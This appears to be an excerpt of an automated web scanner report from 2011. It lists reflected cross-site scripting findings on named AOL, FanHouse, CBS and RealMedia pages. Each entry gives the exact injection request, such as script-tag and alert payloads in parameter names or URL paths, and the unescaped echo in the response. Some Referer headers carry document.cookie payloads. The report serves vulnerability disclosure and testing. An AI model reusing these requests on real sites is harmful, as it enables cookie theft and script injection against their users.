GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1 Host: mads.cbs.com Proxy-Connection: keep-alive Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' D ...[SNIP]...
1.154. http://marlothomas.aol.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://marlothomas.aol.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58af7"><script>alert(1)</script>fb0308338b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?58af7"><script>alert(1)</script>fb0308338b0=1 HTTP/1.1 Host: marlothomas.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://marlothomas.aol.com/?58af7"><script>alert(1)</script>fb0308338b0=1" /> ...[SNIP]...
1.155. http://mlb.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mlb.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 885e5"-alert(1)-"db05883e06a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?885e5"-alert(1)-"db05883e06a=1 HTTP/1.1 Host: mlb.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 54f8b<script>alert(1)</script>5358b4f3ab0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /reflector/setCookie?cb=54f8b<script>alert(1)</script>5358b4f3ab0& HTTP/1.1 Host: money.aol.com Proxy-Connection: keep-alive Referer: http://o.aolcdn.com/os/money/flash/DailyFinanceCookieProxy.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; s_pers=%20s_getnr%3D1297021680436-New%7C1360093680436%3B%20s_nrgvo%3DNew%7C1360093680440%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 19:47:20 GMT Server: Apache-Coyote/1.1 Content-Type: application/json;charset=UTF-8 Content-Length: 45
54f8b<script>alert(1)</script>5358b4f3ab0({})
1.157. http://motorsports.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://motorsports.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54b2"-alert(1)-"03ff745aee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?b54b2"-alert(1)-"03ff745aee2=1 HTTP/1.1 Host: motorsports.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce3a"%3b1a4d966ae1a was submitted in the REST URL parameter 1. This input was echoed as fce3a";1a4d966ae1a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trailersfce3a"%3b1a4d966ae1a/main.adp HTTP/1.1 Host: movies.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334772668.1997950285.1031800576; path=/ Pragma: no-cache Cache-Control: no-store Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; MIME-Version: 1.0 Date: Sun, 06 Feb 2011 20:23:09 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 44419 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head ...[SNIP]... <!-- s_265.server="acp-ld29.websys.aol.com"; s_265.mmxgo=true; s_265.pageName="mov: Page Not Found!"; s_265.channel="us.movies"; s_265.trackExternalLinks="true"; s_265.prop1="trailersfce3a";1a4d966ae1a"; s_265.pfxID="mov"; s_265.disablepihost=false; s_265.prop2="main.adp"; s_265.linkInternalFilters="javascript:,aol.com,moviefone.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
1.159. http://nba.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://nba.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0eec"-alert(1)-"5808854bd27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c0eec"-alert(1)-"5808854bd27=1 HTTP/1.1 Host: nba.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.160. http://ncaabasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ncaabasketball.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6117e"-alert(1)-"46f14e1380e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6117e"-alert(1)-"46f14e1380e=1 HTTP/1.1 Host: ncaabasketball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.161. http://ncaafootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ncaafootball.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11a90"-alert(1)-"2a24bc7b009 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?11a90"-alert(1)-"2a24bc7b009=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79615"><script>alert(1)</script>45b412626c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia79615"><script>alert(1)</script>45b412626c9/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 397 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0c45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:39 GMT;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d5e"><script>alert(1)</script>1a204efbd96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secureb2d5e"><script>alert(1)</script>1a204efbd96/642496272@Bottom3?_RM_HTML_MM_=500101500015500001101 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 262 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:41 GMT;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cb47"><script>alert(1)</script>3d74b029401 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom32cb47"><script>alert(1)</script>3d74b029401?_RM_HTML_MM_=500101500015500001101 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 389 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:44 GMT;path=/
The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83b2b"-alert(1)-"6894311a107 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3?_RM_HTML_MM_=50010150001550000110183b2b"-alert(1)-"6894311a107 HTTP/1.1 Host: network.realmedia.com Proxy-Connection: keep-alive Referer: http://www.masstransitmag.com/online/article.jsp?siteSection=3&id=1358448181--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec11697f1d6d&pageNum=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFL=011Pl1mCU10EfJ|U10Eo1|U10LxY|U1014lt|U10166E|U1016Pl; NXCLICK2=011Plj3sNX_TRACK_Superpages/Retarget_Landingpage_Nonsecure!y!B3!LxY!puiI
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:49:37 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: RMFD=011PmBY9O10M69; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 601 Content-Type: text/html Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Sun, 06-Feb-2011 20:50:37 GMT;path=/
<SCRIPT TYPE="text/javascript" language="JavaScript"> var mm247d=new Date(); var mm247m=mm247d.getTime(); mm247d.setTime(mm247m+3000*24*60*60*1000); var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS"); var mm247o = "50010150001550000110183b2b"-alert(1)-"6894311a107"; var mm247m = ""; if (mm247o.length==21) { var i=0; while (i<21) { mm247m += mmarray[i] + mm247o.charAt(i); i=i+1; } } document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString() ...[SNIP]...
1.166. http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d5c"><script>alert(1)</script>a72c54c0017 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1 HTTP/1.1 Host: news.travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/?96d5c"><script>alert(1)</script>a72c54c0017=1" /> ...[SNIP]...
1.167. http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21590"><script>alert(1)</script>0c2f336d704 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/?21590"><script>alert(1)</script>0c2f336d704=1" /> ...[SNIP]...
1.168. http://news.travel.aol.com/2011/01/12/travel-myths-debunked/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://news.travel.aol.com
Path: /2011/01/12/travel-myths-debunked/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de56"><script>alert(1)</script>fa2fd84284b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/01/12/travel-myths-debunked/?5de56"><script>alert(1)</script>fa2fd84284b=1" /> ...[SNIP]...
1.169. http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d2d5"><script>alert(1)</script>d79e2e7793e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/?4d2d5"><script>alert(1)</script>d79e2e7793e=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a1e"><script>alert(1)</script>7f2ad4a8dc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/?a9a1e"><script>alert(1)</script>7f2ad4a8dc9=1" /> ...[SNIP]...
1.171. http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5186"><script>alert(1)</script>a0c68995fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/?b5186"><script>alert(1)</script>a0c68995fa0=1" /> ...[SNIP]...
1.172. http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a878f"><script>alert(1)</script>e0f1e935f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/?a878f"><script>alert(1)</script>e0f1e935f50=1" /> ...[SNIP]...
1.173. http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://news.travel.aol.com
Path: /best-of/when-is-ash-wednesday-2011/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15cf3"><script>alert(1)</script>4e8bf31abab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <meta property="og:url" content="http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/?15cf3"><script>alert(1)</script>4e8bf31abab=1" /> ...[SNIP]...
1.174. http://news.travel.aol.com/explore-america/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://news.travel.aol.com
Path: /explore-america/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc0f9"><script>alert(1)</script>d8df1da81dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /explore-america/?fc0f9"><script>alert(1)</script>d8df1da81dc=1 HTTP/1.1
Host: news.travel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
